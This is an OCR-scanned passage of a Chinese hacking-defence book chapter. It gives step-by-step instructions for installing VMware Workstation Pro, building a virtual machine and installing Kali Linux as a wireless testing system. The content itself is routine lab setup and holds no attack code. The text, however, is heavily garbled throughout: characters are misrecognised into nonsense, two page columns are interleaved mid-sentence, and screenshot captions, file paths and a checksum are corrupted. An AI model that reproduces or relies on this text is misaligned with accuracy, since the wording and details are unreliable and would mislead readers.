已 准备 好 安装 VMware Workstation Pro 


上 - 步 @) [安装 0 ] 取消 


单 击 “ 安 装 ” 按 钮 ， 等 待 一 段 时 间 后 


pA 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


A roa i ee 
workstation Pro 安 装 向 导 已 完成 ”窗口 ， 单 
击 “ 完 成 ”按钮 ， 关 闭 ee se ae 
如 下 图 所 示 。 
由 VMware Workstation pro 安装 一 x 


VMware Workstation Pro 安装 向 导 已 完成 


WORKSTATION 单 击 完成 技术 退出 支 装 向 号。 
PRO 


部 果 要 立民 输入 许可 证 密 让 ， 请 按 下 面 的 许可 证 接 


单 击 “ 创 建新 的 虚拟 机 ”按钮 ， 进 入 
“新 建 虚拟 机 向 导 ” 对 话 框 ， 在 其 中 选择 
IE “ 自 定 义 ” 单 选 按 钮 ， 如 下 图 所 示 。 

[step 图 在 安装 完成 页 面 中 ， 单 击 “ 许 可 证 ” rp 


_ 许 可 证 ) 


> ¢ ~ ~ /> 9 
按钮 ， 跳 转 至 “输入 许可 证 密 钥 ”页 面 ， 在 Pe 
! cp 
其 中 可 以 输入 许可 证 密 钥 ， 如 下 图 所 示 。 
淹 VMware Workstation pro 安装 1 4 您 关 望 使 用 什么 类 型 的 本 置 ? 
输入 许可 证 密 角 ee 〇 由 型 (推荐 (T) 
此 对 活 框 可 保存 产品 许可 证 训 钥 。 已 本 “DR a 通过 几 个 简单 的 步 驶 他 建 Workstation 14.x 
DD) 虚拟 机 。 
许可 证 密 钥 格式: X000300003000030000-X0000 @ 自 定居 (高 级 )(C) 
一 一 一 一 一 一 一 一 一 一 创建 融 有 SCSI 控制 器 类 型 ， 虚 所 磁盘 类 型 
多 以 及 与 旧版 VMware 产品 妆容 性 等 高 加 选 项 
疮 人 闪 大作 厅 诺 苗 印 ， 碱 并 汪 直 陆地 知 此 字 民 施 宅 ， 以 后 声 秀 人。 虚 瓜 机 。 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 虚 
拟 机 硬件 兼容 性 ”对 话 框 ， 在 其 中 设置 虚 

全 看 阁 - 公 ， ， 这 这 默认 设 

虚拟 机 安装 完成 后 ， 重 新 启动 系统 | 拟 机 的 硬件 兼容 性 ， 这 里 采用 默认 设置 


、 如 下 图 所 示 。 
后 ， 才 可 以 使 用 虚拟 机 ， 至 此 ， 便 完成 了 
s i 2 新 建 起 拟 机 向 导 X 
wmware 虚 拟 机 的 下 载 与 = 装 ， 如 下 图 开 人 选择 虚拟 机 硬件 兼容 性 
该 虚拟 机 霖 要 何 种 宣 件 功能 ? 
出 VMware Workstation Pro 安装 
虚拟 机 硬件 兼容 性 

A 四 ea 

Ci 外 本 忆 入 对 统 ， 于 上 PP 进 和 的 弄 件 兼容 性 [H): We 14.x v 

re 六 和 在 以 后生 让 兼容 : ESX Server(5) 

了 R 制 |: 
王 64 GB 内 存 
了 


和 8 3.1.3 ”创建 虚拟 机 系统 

安装 完 虚 拟 机 以 后 ， 就 需要 创建 一 
台 真 正 的 虚拟 机 ， 为 后 续 的 测试 系统 做 准 
备 。 创 建 虚拟 机 的 具体 操作 步骤 如 下 : 单 击 “ 下 一 步 ”按钮 ， 进 入 “安装 客 
双击 果 面 安装 好 的 VMware 虚拟 机 图 户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 “ 稍 后 
标 ， 打 开 VMware 虚 拟 机 软件 ， 如 下 图 所 示 。 安装 操作 系统 ” 单 选 按钮 ， 如 下 图 所 示 。 
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新 建 虐 氢 机 向 导 Xx 


安装 客户 机 操作 系统 
虚 凡 机 如 月 柳 理 机 ， 需 要 操作 系统 。 变 将 如 何 专 装 客户 机 操作 系统 ? 


去 装 来 源 : 
二 装 程 序 泊 内 人 {D); 


无 可 用 驱动 器 


中 安装 程序 光盘 股 像 交 件 (5s0(M): 
E:\BaiduNetdskDownload\OS X 10.11.1(15842).iso 浏览 (R)... 


(@ 稍 后 去 装 押 作 凶 统 (5)。 
他 经 的 虚拟 机 将 包含 一 个 空 日 硬盘 。 


鞍 助 < 上 一 步 (B) | 下 一 步 (N) > 职 清 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 客 
户 机 操作 系统 ”对 话 框 ， 在 其 中 选择 Linux 
单 选 按钮 ， 如 下 图 所 示 。 


选择 客户 机 操作 系统 
此 点 拟 机 中 将 专 装 于 种 操作 系 纺 ? 


客户 机 操作 邓 流 


OO Microsoft Wndows(\W) 
® LinuxtL) 

OO Novell Necware(E) 

OO Solare(S) 

OVMware ESX(X) 
〇 其 他 (0) 


版 本 (V) 
Ubuntu w 


帮助 < 上 一 步 (B) 下 一 步 (N) > 职 消 


单 击 “ 版 本 ”下 拉 按 钮 ， 在 弹出 的 下 
拉 列 表 中 选择 “其 他 Linux 4.x 或 更 高 版 本 
内 核 64” 版 本 系统 ， 这 里 的 系统 版 本 与 主 
机 系统 版 本 无 关 ， 可 以 自由 选择 ， 如 下 图 
所 示 。 


Red Hat Enterprise Linux 4 64 位 A 
Red Hat Enterprise Linux 4 

Red Hat Enterprise Linux 3 64 位 

Red Hat Enterprlse Linux 3 

Red Hat Enterprise Linux 2 

Red Hat Lnux 

Sun Java Desktop System 

SUSE Lnux Enterprise 12 64 位 

SUSE Lnux Enterprise 11 64 位 

SUSE Lnux Enterprise 11 

SUSE Lnux Enterprise 10 64 位 

SUSE Lnux Enterprise 10 

SUSE Linux Enterprise 7/8/9 64 位 

SUSE Lnux Enterprise 7/8/9 

SUSE Lnux 64 位 
SUSE LNnux 
Turbolinux 64 位 
Turbolinux 
Ubuntu 64 位 
Ubuntu 

cit photon OS S64 村 


性 


过 
其 他 Linux 2.5.x 内 核 64 位 
其 他 Linux 2.6.X 内 核 


其 他 Linux 2.4.x 内 校 64 位 
es 


斋 Linux 4.x ET 54 位 


单 击 “下 一 步 ”按钮 ， 进 入 “命名 虚 
拟 机 ”对 话 框 ， 在 “虚拟 机 名 称 ” 文 本 框 
中 输入 虚拟 机 名 称 ， 在 “位 置 ”中 选择 一 
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个 存放 虚拟 机 的 磁盘 位 置 ， 如 下 图 所 示 。 


新 续 诸 拟 机 向 导 XxX 


傅 名 虚拟 机 
您 希望 该 虚拟 机 使 用 什么 宅 称 ? 


碟 以 机 名 称 (V): 
KalHLinux 
位 置 (L》: 


| dhVirtual Machinas\Kali-Linux 浏览 (R).,. 


在 编辑 > 首选 击 中 可 和 更改 默认 位 置 。 


< 上 一 步 (B) 取消 


单 击 “ 下 一 步 ” 按钮 ， 进 入 “处 理 器 
配置 ”对 话 框 ， 在 其 中 选择 处 理 器 数量 ， 
一 般 首 通 计算 机 都 是 单 处 理 ， 所 以 这 里 不 
用 设置 ， 处 理 器 内 核 数量 可 以 根据 实际 处 
理 器 内 核 数量 设置 ， 如 下 图 所 示 。 


新 建 虑 拟 机 向 导 xX 
处 理 姑 阮 寺 
为 此 虚拟 机 指定 处 理 器 数 里 。 
处 理 器 
处 理 强 赦 旦 (p): 1 ~ 
每 个 处 理 器 的 内 核 数 旦 (C): 
3 
咎 
8 
12 
16 
帮助 < 上 一 步 (B) 取消 


单 击 “下 一 步 ” 按 钮 ， 进 入 “此 虚拟 
机 的 内 存 ” 对 话 框 ,根据 实际 主机 进行 设 
置 ， 最 少 内 存 不 能 低 于 768MB， 这 里 选择 
4096MB 也 就 是 4G 内 存 ， 如 下 图 所 示 。 


新 是 虚 拟 机 向 导 xX 
此 虚拟 机 的 内 存 


您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 
指定 分 辽 给 此 虑 弘 机 的 内 存量 。 内 存 大 小 必须 为 4 MB 的 倍数。 
ss 此 虚拟 机 的 内 存 (M): 0g ve 


4@ 者。 是 最 大 推荐 内 有: 
2GB 6.2 6B 


S12 MB 悦 ” 同 推荐 内 存 : 
256 MB 768 MB 


64 MB 刁 客户 机 操作 系统 最 嫂 准 荐 内 存 : 
32 MB 本 32 MB 


帮助 < 上 一 步 (B) 取消 
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step 加 单 击 “下 一 步 ” 按 钮 ， 进 入 “网 络 类 单 击 “ 下 一 步 ” 按 钮 ， 进 入 “选择 
型 ”对 话 框 ， 这 里 选择 “使 用 网 络 地 址 转 磁盘” 对话 框 ， 这 里 选择 “创建 新 虚拟 磁 
换 NAT” 单 选 按钮 ， 如 下 图 所 示 。 盘 ” 单 选 按钮 ， 如 下 图 所 示 。 


新 建 虚 拟 机 向 导 Xx 
网 络 类 型 
要 添加 哪 类 网 络 ? 
网 妆 连 接 
中 使 用 桥接 网 络 (R) 
为 宫 户 机 栋 作 系统 提 典 直接 访 ia]h 部 以 太 民 9 竺 9 缩 的 权限 。 客户 机 在 外 部 网 络 上 必须 
有 肠 己 的 下 地 址 。 


@ 使 用 网 阁 地 址 转换 (NAT)(E) 


新 建 虚拟 机 向 导 xX 


选择 磁盘 
让 要 使用 那个 梧 盘 ? 


碎 盘 
罗 创建 新 虚拟 磁盘 (V) 


虚拟 磁盘 由 主机 文件 系统 上 的 一 个 或 务 个 文件 组 成 ， 客 户 机 操作 系统 会 将 其 视 为 
单个 硬盘 。 虚 拟 配 盘 可 在 一 全 主机 上 或 多 台 主 机 之 间 轻 梭 夏 制 或 移动 。 


Ht . A En | C 〇 使用 现 有 壶 拟 磋 盘 (E) 
2 这 户 员 昌 作 系统 提供 使 用 主机 地 址 访问 主机 拨号 连接 或 外 部 以 太 网 网 络 连 接 的 
由 选择 此 迁 项 可 重新 伟 用 以 前 本 畦 的 谤 盘 。 
〇 使 用 公主 机 模式 网 络 (H 避 ) 使 用 物 里 谨 盘 《适用 于 高 级 用 户 ]P) 
档 要 愉 机 间作 条 统 过 挡 到 主机 上 的 专用 虚拟 网络 ， 选 召 此 选项 可 为 虚拟 机 捍 世 直接 访问 本 地 硬盘 的 权限 。 答 要 且 有 管理 员 特 机 。 
〇 〇 干 使 用 网 络 连接 [T) 
帮助 < 上 一 步 (B] 取消 
帮助 < 上 一 步 (B) 取消 = 


[Sep 国 单 二 “下 一 步 ” 按钮 ， 进 入 “选择 I/ [sp 加 羊 击 “ 下 一 步 ”按钮 ， 进 入 “指定 磁 
O 控 制 器 类 型 ”对 话 框 ， 这 里 选择 LSI Logic | 一 容 量 ”对话 框 ， 这 里 磁 检 大 小 设置 40GB 
单 选 按钮 ， 如 下 图 所 示 。 空间 即 可 ， 选 择 “ 将 虚拟 盘 拆 分 成 多 个 文 
件 ” 单 选 按 钮 ， 如 下 图 所 示 。 


新 建 虚拟 机 向 导 x 
选择 I/O 控制 器 类 型 新 建 虚 拟 机 向 导 x 
| 磁盘 大小 为 范 少 ? 
JI0 控制 器 类 型 
5C5I 控制 器 : 四 
最 大 隧 盘 大 小 (G6)(5): 4d 片 
BusLogic(U) (不 适用 于 从 位 客户 机 ) 


针对 其 他 Lnux 4.x 或 更 高 版 本 内 核 564 位 的 建议 大 小 : 8 GB 
@)L5I Logic(L) “(推荐 ] 
OLSI Logic SAS(S) 中 立即 分 本 所有 磁盘 空 昌 (A)。 


分 配 所 有 容量 可 以 提高 性 能 ， 但 要 求 折 有 物理 谱 盘 空间 立即 可 用 。 如 果 不 立 即 分 配 所 有 
空 是 ,虚拟 磁盘 的 空间 虽 初 很 小 ， 会 随 着 神器 其 中 添加 数据 而 不 断 变 太 。 


将 虚拟 磁盘 存 让 为 单个 文件 (DO) 

® 将 虚拟 磁盘 拆 分 成 多 个 率 件 (N) 
拆 分 磁盘 后 ， 可 以 更 轻 格 地 在 计算 机 之 间 称 动 虚拟 机 ， 但 可 能 会 降 项 大 容 旺 磁盘 的 性 
hes> 


帮助 < 上 —(B) 取消 
so 图 站 二 “下 一 步 ” 按 名， 进入 “选择 [mg 图 单 二 “下 一 步 ”按钮 ， 进 入 “指定 磁 
磁盘 类 型 ”对 话 框 ， 这 里 选择 SCSI 羊 选 按 盘 文 件 ” 对 话 框 ， 这 里 保持 默认 即 可 ， 如 
钮 ， 如 下 图 所 示 。 下 图 所 示 。 


新 奸 庶 拟 闹 向导 x 
新 建 虚 拟 机 向 导 Xx 
选择 磁盘 类 型 
指定 磁盘 文件 
您 7 
i 您 要 在 何 处 存 个 磁盘 文件 ? 
"Fr 这 她 开 I 
出 j 昌 类 型 磁盘 文件 (F) 
SO 将 使 用 多 个 碰 盘 文件 创建 一 个 40 68 诬 拟 磁盘 。 将 根据 此 文件 名 自动 命名 这 些 详 盘 广 
® scsI(s) (推荐 ) 件 。 
O SATA(A) 浏览 (R)... 
O NVMe(V) 
帮助 < 上 一 步 (B) 取消 帮助 < 上 一 步 (B) 取消 
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单 击 “下 一 步 ”按钮 ， 进 入 “已 准备 
好 创建 虚拟 机 ”对 话 框 ， 如 下 图 所 示 。 


新 建安 拟 机 启 导 x 

已 准备 好 创建 虚拟 机 
eu 。 就 后 可 以 安装 其 他 Linux 4.X 或 利 高 版 本 内核 64 
we 

插 使 用 下 列 巩 着 创 建 虚 拟 机 : 

名 称 : Kali-Linux 

位 善 : d:\Vrtual Machines\KalHLinuX 

版 本 : Workstation 14.x 

操作 予 统 其 他 Lnux 4.x 或 事 言 版 本 内 校 时 位 

硬盘 : 40 GB, 拆 分 

和 内存: 4096 MB 

网 络 适 配器 : NAT 

其 他 世 备 ， 4 个 CPU 内 校 , CD/DVD, U5B 控制 芝 , # 王 0 机 , 再 卡 


自 定 兴 三 件 (C)… 


< 上 一 步 (B) 


取消 


[step 贺 单 去 “完成 ”按钮 ， 至 此 ， 便 创建 了 
一 个 新 的 虚拟 机 ， 如 下 图 所 示 。 这 一 步 相 
当 于 组 装 了 一 台 裸 机 计算 机 ， 这 当中 的 硬 
件 设 配 ， 可 以 根据 实际 需求 再 进行 更 改 。 


| Bl Kalii-Unux - VMware Workstation 一 口 XxX 


文件 F) ”六 镶 (E】 音 震 (v】 寺 拟 机 [IM] 连 藉 卡 [T) 如 动 H) | 了 ~ | 


‘oN ee 


[0 主页 | 由 Kali-Limuc 
上 站 和 
四 | Kali-Linux 
半 开启 此 才 所 机 
各 | 握 贺 大 可 机 设 问 
wm 设备 
闪存 4 GB 
回 处 理 路 4 
击 硬 至 [SCSN) 40 68 
JCD/DVD (IDE) 目 动 恰 测 
钨 网 洛 汪 本 共 NAT 
图 U56 控制 器 五 王 
哇 二 卡 目 动 恰 齐 
抽打 用 机 他 下 
副 呈 二 向 月 动 性 测 
描 还 
在 此 处 县 入 7 


” 诬 氟 机 详细 们 己 


状 恋 : 已 关机 
配置 文 忻 : DAVirtual MachinesiKali-UnuAKali-Linuovmx 
醒 件 焚 容 性 : Workstation 14.x 言 议 机 
主 IP 融 直 : 网 站 便 息 不 本 所 


安装 与 更 新 Kali Linux 操 
作 系 统 
现实 中 组 装 好 计算 机 以 后 需要 给 它 安装 


拟 机 也 一 样 ， 同 样 需要 安装 一 个 操作 系统 ， 
本 节 介绍 如 何 安装 Kali Linux 操 作 系 统 。 


3.2.1 下 载 Kali Linux 系 统 


Kali Linux 是 基于 Debian 的 Linux 发 行 
版 ， 设 计 用 于 数字 取证 操作 系统 。 由 Offen- 


3.2 
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sive Security Ltd 维护 和 资助 。 最 先 由 Offen- 
sive Security 的 Mati Aharoni 和 Devon Keams 
通过 重 写 BackTrack 来 完成 ，BackTrack 是 他 
们 之 前 写 的 用 于 取证 的 Linux 发 行 版 。 
下 载 Kali Linux 系 统 的 具体 操作 步 又 
如 下 : 
在 浏览 器 中 输入 Kali Linux 系 统 的 网 
址 : https: Wwww.kali.org， 按 Enter 键 打开 
Kali 官 方 网 站 ， 如 下 图 所 示 。 


[KAUI] RE J 


Our Most Advanced Penetration Testing Distribution, Ever. 


Latest Kali Linux News and Tutorials 


AINCED PACKAGE 
ANAGEMENT 


单 击 Downloads 菜 单 ， 在 弹出 的 菜单 
列表 中 选择 Download Kail Linux 选 项 ， 如 下 
图 所 示 。 


Downloads Training 
Download Kali Linux 


Kali Linux NetHunter 


Kali Linux Revealed Book 


Release Information 


Kaili 提 供 了 各 种 版 本 的 系统 下 载 ， 用 

户 可 以 通过 HTTP 或 者 Torrent 两 种 方式 进行 

下 载 ， 如 下 图 所 示 。 用 户 可 根据 实际 情况 

选择 下 载 相应 的 版 本 ， 这 里 选择 最 上 面 一 项 
“Kali Linux 64 Bit” 进 行 下 载 。 


Image Name Download Siz Version sha256sum 
Kali Linux 64 Bit TTP | Torrent 3.0C 2018.3a 51bc17eeB3ffB12e5674af35563131bb336e943ccefaBc5G68B5S8B67fqbfB137Tesb2 
Kali Linux 32B TIP ent 3.16 2018.ja 
Kali L Lisk TTF 2018.ja 1 Se 
54 
Kali L Li 时 TTF 1 2018.ja  c207f43492282e d 1 
32 bit 
Kali L Kd TIP 3. 2018.ja 
64 
Kali |L LXDE TTP | Torrent 2.30 2018.3a 1 
640 
Kali l FCE TT 2018 2 
64B 
K l NATE TIP 3 2018.3a 
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Kali 官 方 还 提供 了 快速 装机 方式 
wmware 镜 像 下 载 ， 这 个 列表 不 但 提供 了 
wmware 虚 拟 机 和 镜像， 还 提供 了 vobx 虚 拟 镜 
像 ， 如 下 图 所 示 。 


Kaii Linux 64 bit VMware VM Available on the Offensive Security Download Pag 
Kali Linux 32 bit VMware VIA PAE Available on the Offensive Security Download Paex 
Kali Linux 64 Bit Vbox Available on the Offensive Security Download Paee 
Kali Linue 32 Bit Vbox Available on the Offensive Security Download Page 


全 提示 : 初学 者 建议 先 手动 安装 Kali Linux 
系统 ， 以 后 使 用 熟练 后 可 以 选择 虚拟 机 镜 


3.2.2 ”安装 Kali Linux 系 统 


o 架设 好 虚拟 机 并 下 载 好 Kali Linux 系 统 

后 ， 接 下 来 便 可 以 安装 Kali Linux 系 统 了 。 
安装 Kali 操 作 系 统 的 具体 操作 步骤 如 下 : 
打开 安装 好 的 虚拟 机 ， 单 击 CD/DVD 
选项 ， 如 下 图 所 示 。 


加 Kali-Unux - VMware Workstation 一 口 XxX 
文件 上 明志 看 [5E) ”二 号 (V) 去 执 #UM) 远 现 T) 厂 助 IH) | 胞 > We 
舍 主页 Kalk-Linux 
门 ] Kali-Linux 

bP 开 己 此 zs3 

号 天 说 二 20 贡 论 疾 
v 设备 

三 内 存 468 

器 处 理 器 4 

号 而 笃 [SCSI) 40 GB 

SD 0 

丝 网 洛 湘 耳 路 NAT 

We USB 控制 髓 存 下 

向 产 卡 宕 动 答 列 

三 打 印 机 到 左 

夺 呈 二 骨 自动 检 列 
= 摘 运 

内 入 对 该 志 


w 虚拟 机 详细 信息 
状态 : 已 关机 
院 导 文件; D;\Wirtual Machines\Kali-Linux\Kali-Linux,vmx 
配件 妆 襄 性 : Workstation 14.x 庶 祝 机 
主 IP 拉 址 : 网 海信 芭 不 可 用 


DD 


在 打开 的 “连接 ”界面 中 选择 “使 用 
ISO 映 像 文 件 ” 单 选 按 钮 ， 如 下 图 所 示 。 
“连接 
〇 ] 使 用 物理 驱动 器 (P): 
自动 检测 
@ 使 用 I5O 映像 文件 (M): 
D:\BaiduNetdiskDownload\k ~ | 


高 级 (V).,. 
单 击 “ 浏 览 ” 按 钮 ， 打 开 “ 浏 览 ISO 
影像 ”对 话 框 ， 在 其 中 选择 下 载 好 的 系统 
映像 文件 ， 如 右上 图 所 示 。 
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回 浏览 ISO 咏 太 x 
个 « BaduN. >» kali-linux-2018-3a-amd64-iso vt 深 实 "kali-jinux-2018-3s-am.。 廊 
组 名 ~ 新 尝 广 件 去 
国 此 思 甩 PS 
六 3D 对 条 kali-linux-2018.3a-amd64.iso 2018/9/24 18:21 GuangsuZp file 3 11 
国 视频 


厦 二 二 

i Windows10 (C: 
| ~ TI (DO 

二 本 地 磋 盘 (E;) 


咏 网 络 = y 


] 六 和 全 (N): | kali-linux-2018.3a-amd64.iso | CD-ROM 了 时 你 (*.iso) 


- 
单 击 “ 打 开 ” 按 钮 ， 返 回 到 虚拟 机 
设置 界面 ， 这 里 单 击 “开启 此 虚拟 机 ” 选 
项 ， 便 可 以 启动 虚拟 机 ， 如 下 图 所 示 。 


je 二 言 此 志 氢 机, 
员 顷 各 虚拟 机 设 嘻 

v 运 备 
到 内 契 46B 
加 处 理 器 4 
冯 硬盘 (SCS1) 40 GB 
:全 CD/DVD (DE) .正在 使 用 文件 De 
Et NAT 
图 uss 控 #| 骂 存在 
只 去 卡 下 动 检测 
= 存在 
车 忌 示 器 自动 检测 


启动 虚拟 机 后 会 进入 到 启动 选项 界 
面 ， 用 户 可 以 通过 键盘 上 下 键 选择 Graphical 
install 选 项 ， 如 下 图 所 示 。 


Boot menu 


Live Land64dy) 

Live (and64 failsafe) 

Liue (forensic mode) 

Live USB Persistence 

Liup USB Encrynpted Persistence 
Install 

Graphical install 

Install uith speech symthesis 
flduanced options 


(check kali.orgprst) 
[ENPCK kali,org/prst) 


选择 完毕 后 ， 按 Enter 键 ， 进 入 语言 i 
择 界 面 ， 这 里 选择 “简体 中 文 ” 选 项 ， 如 
下 图 所 示 。 


Select a language 


Choose the language to be used for the installation process, The selected language will also be the 
default language for the installed system. 


Language; 

Basque <- Euskara ~ 

Belarusian - BenapycKan | 

Bosnian - Bosanski 

Bulgarian - Byvnrapoxn 

Burmese - kine 

Catalan < Catala 

Chinese (Simplified) ”- 中文 (篇 体 ) 

Chinese (Traditional) ” - 中文 ( 紫 辽 ) 

Croatian - Hrvatski 

Czech - Cestina 

Danish - Dansk 

Dutch - Nederlands 

Dzongkha - 区 m 

Cnglish - English 

Fsnerantn -Esnerantn S| 
screenshot GoBack | | Continue | 


单 去 Continue 按 钮 ， 进 入 选择 语言 


确认 界面 ， 保 持 系统 默认 设置 ， 如 下 图 
所 示 。 


Select a language 


古迹 话 宫 的 安装 程序 淆 谋 疝 末 全 部 充 成， 

如 果 您 继 颖 以 所 送 语 言 安 去 ， 后 全 Terra 但 是 - 特别 是 如 果 规 便 用 安 琢 程 斥 中 更 高 级 的 进项 - 用 很 小 的 可 能 性 部 分 内 罕 会 以 繁体 
中 六 明示 ， 或者， 如 黑 那 也 不 可 用 ， 则 会 以 这 文明 

要 以 所 迁 的 下 这 娘 颖 安 稚 蚜 > 


oO 


| 屏 某 开 图 | | wm | me | 


单 击 “ 继 续 ” 按 钮 ， 进 入 “请 选择 您 
的 区 域 ” 界 面 ， 它 会 自动 上 网 匹配 。 即 使 不 
正确 也 没有 关系 ， 系 统 安 装 完 成 后 还 可 以 调 
整 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 


应 择 的 区 域 沼 被 用 于 设置 您 的 时 区 以 及 其 好 例如 帮助 决 训 系 戌 区域。 通常 这 店 访 为 雹 所 居 任 的 国家 . 


这 是 根据 您 所 和 择 的 语言 产生 的 短 列 乏 ， 如 黑 没 有 列 出 您 的 区 域 ， 请 选择 "其 负 
局 家 、 萌 地 或 去 区 : 


| 屏幕 烦 图 | 返回 | 地 堵 | 


单 击 “继续 ”按钮 ， 进 入 “请 选择 键 
pi 界面 ， 同 样 系统 会 根据 语言 选择 
来 自行 匹配 ， 这 里 保持 默认 设置 ， 如 下 图 
所 示 。 


请 六 座 培 让 腕 射 ; 


英 式 英语 
保加利亚 庄 (8DS 布局 ) 
保加利亚 语 ( 拼 末 布 局 ) 


而 兰 语 


| 。 屏 凑 可 图 | ¥@®@ || sa | 


单 击 “ 继 续 ” 按 钮 ， 进 入 “配置 网 
络 ” 界 面 ， 这 里 需要 输入 一 个 主机 名 称 ， 
如 输入 Kali， 如 右上 图 所 示 。 


第 3 章 ”搭建 无 线 测试 系统 Kali Linux 


配置 网 络 

请 袖 入 系统 的 主机 名。 

在 机 名 是 在 网 络 中 标示 你 的 系统 的 一 个 单词 ， 如 时 焕 不 知道 主机 名 其 慎 么 ， 请 询问 网 络 管 理 员 ， 如 里 炮 正在 设置 内 部 网 络 ， 那么 可 以 随 鲜 写 个 
名 字 . 


主机 和 名; 


| RE 开 图 | ia 四 || ma | 


单 击 “继续 ”按钮 ， 进 入 “配置 网 
终 ” 界 面 ， 这 里 可 以 输入 一 个 域名 ， 也 可 
以 设置 域名 为 室 ， 如 下 图 所 示 。 


以 随 蕊 写 一 个 ， 但 是 要 确保 修 所 有 计算 机 的 域名 和 是 一 样 的 。 
构 言 : 


CE 


屏幕 玫 图 | | mm || ws | 
按 Enter 键 ， 进 入 “Root 用 户 密 码 ” 界 
面 ， 这 里 可 以 设置 两 个 相同 的 帘 码 ， 如 下 
图 所 示 。 


Root 用 户 密码 : 


CC 


DJ 显示 明文 密码 


为 了 保证 您 的 密码 正确 无 误 ， 请 再 次 输入 相同 的 root 密码 。 
请 再 次 输入 讶 码 以 验证 其 正确 性 : 


z 


DJ 显示 明文 密码 


按 Enter 键 ， 进 入 磁盘 划分 界面 ， 新 手 
EN 分 也 就 是 选择 “使 用 整个 磁盘 ” 
选项 ， 如 下 图 所 示 。 


向 导 - 使 用 整个 磁盘 

向 导 - 使 用 整个 磁盘 并 配置 LVM 

向 导 - 使 用 整个 磁盘 并 配置 加 密 的 LVM 
手动 


按 Enter 键 ， 进 入 选择 分 区 磁盘 界面 ， 
这 里 可 以 保持 默认 设置 》 如 下 图 所 示 。 


注意 ， 所 选 磁盘 上 的 全 部 数据 都 将 被 放 除 ， 但 是 您 还 是 有 确认 是 和 否 真 的 要 这 么 做 的 机 会 。 
请 选 妊 要 分 区 的 磁盘 : 


SCSIl (0,0,0) (sda) - 42.9 GB VMware, VMware Virtual 5S 


按 Enter 键 ， 进 入 文件 分 区 界面 ， 这 
os 如 下 图 所 示 。 


3 


二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


选 定 要 分 区 者 想来 新 安 琢 的 系 撞 将 是 这 癌 计算 机 上 附 一 的 境 作 系 弹 。 如 困 的 确 如 此 ， 您 度 访 可 以 安全 掺 将 GRUB 和 启动 引导 器 实 狼 到 复 一 硬 电 的 主 引 导 记 录 
(MBR) 上 . 
四 星 告 : 如 果实 毯 程 厅 无 法 在 您 的 计算 机 上 拧 测 到 已 存在 的 其 好 操作 夭 绕 ， 收 改 主 引 昼 记 荡 动 作 乔 时 委 使 该 操作 系 缔 无 法 启动 但是， 您 可 以 宵 

SCSIl1 (0,0,0) (sda) -VMware, VMware Virtual S: 42.9 GB i CL 

着 GRUB 局 动 引 导 吏 安 关 到 二 引导 记 灵 (MB3R) 上 加 ? 
该 磁盘 可 以 使 用 以 下 数 种 不 同方 式 来 进行 分 区 。 如 果 您 不 确定 ， 请 选择 第 一 个 。 〇 理 

向 是; 
分 区 方案 : es 


按 Enter 键 ， 进 入 选择 引导 路 径 界面 ， 
特 /home 放 在 单独 的 分 区 se “dev/sda” 选项 ， 如 下 图 所 示 < 


和 将 /home、Nar 和 上 mp 都 分 别 放 在 单独 的 分 区 
| 您 需要 通过 特 GRUB 局 动 引 导 蔡 安 法 到 可 局 动 设备 上 以 使 新 安装 的 系统 能 鲍 局 动 。 通 宫 的 作法 是 芝 GRUB 玄 装 到 候 第 一 块 硬盘 的 主 引导 记录 


(MBR) 上 ， 各 时 您 梧 党 ， 也 可 以 将 GRUB 安装 到 驱动 蔚 的 其 从 地方， 或 者 其 他 的 级 动 问 上 ， 甚 至 还 可 以 安装 到 一 张 软 盘 上 
安 共 局 动 引 导 巾 的 设 音 : 


按 Enter 键 》 进入 分 区 确认 春 面 : dn 下 手动 宰 入 设 遇 
Idevisda 
图 所 示 。 
> ™ ~ » > 。 如 一 四 
这 是 铭 目 前 已 配置 时 分 区 和 持 缉 上 有 纤 全 信息。 请 运 并 一 个 分 区 以 外 发 其 变 置 [文件 在 纺 、 圭 新 点 部 ) ,或 渤 择 一 全 空 交 空 河 以 创建 新 分 区 ， 只 按 Enter 键 》 讲 入 完成 安装 》 提示 用 a 


或 进 帮 一 个 这 用 以 和 前 比 天 分 区 乱 。 
重启: 进入 系统 ， 如 下 图 所 示 。 
软件 RAID 设置 
配置 训 钳 性 管理 器 
配置 加 空 着 


安 坝 完成 
配置 iSCSI 
! 安装 过 程 已 经 完成 ， 访 足 重 局 进 和 人 您 鸭 铬 系 蚁 的 时 候 了 。 请 确认 已 经 取出 了 安装 介质 ， 以 使 您 能 够 启动 到 新 系统 而 非 重新 开始 宏和 法 
SCSIi (0,0,0) (sda) - 42.9 GB VMware ,VMware Virtual $ 
> #1 主 38,7 GB f ext4 了 


d 


> #5 逐 芒 4.36GB f swap swap 


a 按 Enter 键 ,安装 完成 后 重启 ， 进 入 用 


特 椒 分 区 设 定 井 物 收 改写 入 碰 仍 


户 名 界面 ， 在 其 中 输入 root 管 理 员 账号 ， 如 


step 加 按 Enter 键 ， 进 入 格式 化 分 区 界面 ， 选 下 图 所 示 。 
rp pi Er 


如果 您 继续 ， 以 下 所 列 出 的 修改 内 容 将 会 写 入 到 磁盘 中 。 或 者 ， 您 也 可 以 手动 来 进行 其 它 修改 。 


以 下 设备 的 分 区 表 已 改变 : 
SCSI1 (0,0, 0) (sda) 


以 下 分 区 将 被 格式 化 : 
SCSIl (0,0,0) (sda) 设备 上 的 第 1 分 区 将 设 为 ext4 
SCSIl (0,0,0) (sda) 设备 上 的 第 5 分 区 将 设 为 swap 


头 改 动 写 人 磁盘 县 ? 
CO) 理 


按 Enter 键 ， 进 入 配置 软件 包 管 理 器 界 
面 ， 这 里 保持 默认 设置 ， 如 下 图 所 示 。 [sep 国 单 击 “ 下 一 步 ” 按 钮 ， 进 入 


网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 ， 也 可 以 用 来 提供 较 新 版 本 的 软件 。 面 ， 在 其 中 输入 设置 好 的 管 
如 下 图 所 示 。 


登录 窗 码 
理 员 黎 码 ， 


使 用 了 网 结 挤 像 胎 ? 


Gr 


按 Enter 键 ， 进入 是 否 使 用 代理 上 网 界 
面 ， 设 置 保持 默认 设置 ， 如 下 图 所 示 。 


